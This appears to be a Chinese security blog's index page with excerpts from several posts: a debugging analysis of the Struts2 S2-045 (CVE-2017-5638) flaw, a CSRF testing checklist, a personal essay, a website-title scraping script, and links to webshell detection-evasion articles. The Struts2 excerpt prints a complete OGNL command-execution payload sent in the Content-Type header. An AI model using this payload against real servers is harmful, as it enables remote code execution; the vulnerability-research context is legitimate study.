作者: LandGrey ●
创建时间: 2018年8月19日 14:39 ●
标签:
#网络安全,
#Web安全备忘录,
#代码审计
0x00:环境准备 通过 Apache Struts2 Release 页面可知:受struts2-045(CVE-2017-5638)漏洞影响的最新struts版本为 Struts 2.5.10, 在官方 archive 页面下载Struts 2.5.10 showcase(app)版本,用Tomcat 7本地部署应用进行debug。 0x01:调试准备 补丁移除了 apache/struts2/interceptor/FileUploadInterceptor.java 文件中 LocalizedTextUtil.findText() 函数对错误信息的处理部分: 漏洞信息: 1.漏洞发生在 Jakarta 上传解析器 2.受影响struts版本是Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10 3.通过Content-Type这个header头,进而执行命令,通过 Strus2 对错误消息的处理进行回显 POC (Windows 弹计算器): ${(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='calc').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; 0x02:正式调试 根据上面的信息,用IDEA 在 struts2-core-2.5.10.jar!/org/apache/struts2/dispatcher/Dispatcher.class 第584行下第一个断点: 然后如下图所示,用Burpsuite在 HTTP Content-Type ...
更多 →
作者: LandGrey ●
创建时间: 2018年6月19日 19:50 ●
标签:
#渗透测试,
#Web安全备忘录
漏洞简述用户认证成功后访问或点击了黑客控制的网站链接,浏览器根据黑客网页代码指示,使用用户的身份凭证(Cookie)自动请求服务器,冒充用户身份完成恶意操作。 根本原因HTTP协议是无状态的协议,所以引入了Cookie机制来辨识和跟踪用户,但Cookie最初被设计成允许在第三方网站发起的请求中携带,从而成为CSRF漏洞滋生的土壤。 利用流程测试思路下面的英文描述更清楚简洁一点 Perform the request without modifying the parameters, see what the result is Remove the CSRF token completely Modify one of the characters in the token (keep the length same) Remove the value of the token (leave the parameter in place) POST request cnvert to a GET request ...
更多 →
作者: LandGrey ●
创建时间: 2018年6月14日 01:37 ●
标签:
#分享,
#思考
从阶梯教室出来,突然不知道该往哪里走,看到图书馆灯火通明,就不自觉的要往图书馆的方向走,然后好像别人指引似的,浏览到一本书《本性孤独》。有趣的是作者根本一点名气也没有,而我却从中看到了自己的影子。 三毛说:”心之何如,有似万丈迷津,遥亘千里,其中并无舟子可以渡人,除了自渡,他人爱莫能助。”突然回想到那些时光,那些曾经让我想逃避,让我厌恶的时光。 初中最为致命。在学校中,我脑子里面除了学习,似乎再无其它 东西。那时的自己也最为强大,强大到可以主观上屏蔽一切影响我学习书本内容的所有东西。可以忽视教室里所有的人,想象着只有自己一个人在一个独立的空间,谁都无法影响到我。仍书、吵闹、晃来晃去的手机,在我眼中就是空气一般的存在。那时冬天早上,天还没有亮,可以看见夜空的星星。我洗头就是直接用凉的自来水冲头,出宿舍门不久,头发都冻成了冰渣,一般都是等完了冰渣,再用手直接把头上的冰渣都拨掉。出去在小摊上买点东西吃,然后趴在教室的栏杆上仰望下天空不过3秒,就回到教室中,一人边吃东西,边背书。这样的结果是,现在仍然具有早上凉水冲头的技能。那时,脑子一根筋的我错过了很多美好的事情。也是那时独特的缺憾。 如此,我梦想着逃避这种生活,当然,慢慢的,我不再如此单调的生活,只因我不想再错过些那时本应该发生的美好的事情。但是,慢慢的,再也找不回那时的感觉。自己也试图找寻过原因,但最终还是欺骗自己说,人长大了,总归是要变一些的,怎么能找回以前的感觉呢? 另我惊讶的是,我今天确实找到了,一种在不知下一步往何处去时的深沉的思考引我找到一本书,然后看到了多年前寻找的问题的答案。 本来以为这世上的人只会走两条路:一条是按照条条杠杠,别人制定的规矩,跟着大众走;一条是主观的绝对的自由 ,跟着自己的心走。可是,我突然从书中指引的回忆中看到我在初中时走的另一条道路:就只是往前走,脚踏在自己的心上,心贴地面。这就是答案,原来一直跟着自己的心走,可是心在胸膛,这个大家都认为的再正常不过的位置。心呆在胸膛久了,就浮到空中了,没有原来的生气。 一直想不通为什么总想找到那段曾让我逃避的时光,那让我怀想到难受的时光。原来,那段时光给了我人生的第三条路。现在,抛却所有的理所当然和麻木,回到路上,青春洋溢。 作于 2015-10-23
更多 →
作者: LandGrey ●
创建时间: 2018年6月8日 22:43 ●
标签:
#分享,
#思考
一. 20行代码临时任务,需要自动化收集大概文本中指定的100多个域名的网站标题(title)。这种以前也做过的简单任务,自己操作起来可以说是驾轻就熟了。花个两分钟,写个脚本,大概20行代码如下:#!/usr/bin/env python# coding:utf-8#import reimport requestsheaders = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",}def poc(url): try: req = requests.get(url, headers=headers, timeout=15) title = re.findall("<title>(.*?)</title>", req.text, re.I | re.M) if title: return url + " " + title[0] else: return False except: return False使用POC-T 框架调用以上代码,就可以批量获取网站title了。使用Python脚本+框架的方式,可以简单快速的完成任务。但是实际上,操作起来最多只能获取到大概60%左右的网站标题。剩下的怎么办?还是手工一个个打开网页看标题……二. 问题所在批量获得网站Title这个编写脚本的技术工作,自己以前在渗透测试中,也做过很多次。要是有人问我"怎么批量获取网站的标题",我心里可能会嘲笑问我的人"这么简单的事都不会"。但是到了真正我来完成批量获取网站标题的任务时,祭出的20行代码却只能获取到60%左右的网站标题,剩下的大量不能正常获取的网站标题,还得人工一个一个的去看。浪费大量的精力去做本来可以很好的利用自动化方式解决的事情,让我感到十分羞愧。20行代码存在的主要问题,其实自己也大概清楚是怎么回事:编码处理不当。因为各种环节问题,一些中文标题解码错误,不能正确获得;不少网站存在首页跳转,程序获取不到跳转地址,自然拿不到标题;各种其它细节处理与疏于考虑的问题但自己在批量获取网站标题这个工作上,平庸到可以说是"怎么批量获取网站标题"都不会的人。最终应该嘲笑的是自己长久以来对平庸技术的满足与追求更加精进技术需求的漠视。三. 200行代码知道了问题所在,我就下决心要解决长期以来的对此问题的漠视,做个会"批量获取网站标题"的人。果然,写出准确率很高的批量获取网站Title的代码,要考虑并处理很多种情况,包括:编码问题。中文、UTF-8及Unicoded等转换。全面考虑各种首页跳转的情况。网站跳转代码的正则匹配表达式的书写考虑要全面。HTTPS协议网站请求相关问题。匹配网站标题的正则表达式的正确书写。Js代码写网站标题的情况。HTML实体编码的网站标题。中间包含换行、Tab键等空白字符标题的处理。网站请求错误重试、延时、网页自动跳转、超时时间、headers等考虑。获取不到网站Title的原因要显示出来其它当然,目前代码可能还是有不完善或者考虑不到的地方,一些较少遇到的情况会人为忽略。比如有的网站首页会以JavaScript ...
更多 →
作者: LandGrey ●
创建时间: 2018年5月27日 17:41 ●
标签:
#渗透测试
不再单独搬砖了,请去下列地址去查看:Github文章和Webshell合集 :webshell-detect-bypass先知社区:php一句话木马检测绕过研究利用Java反射和类加载机制绕过JSP后门检测构造免杀的asp一句话木马
更多 →
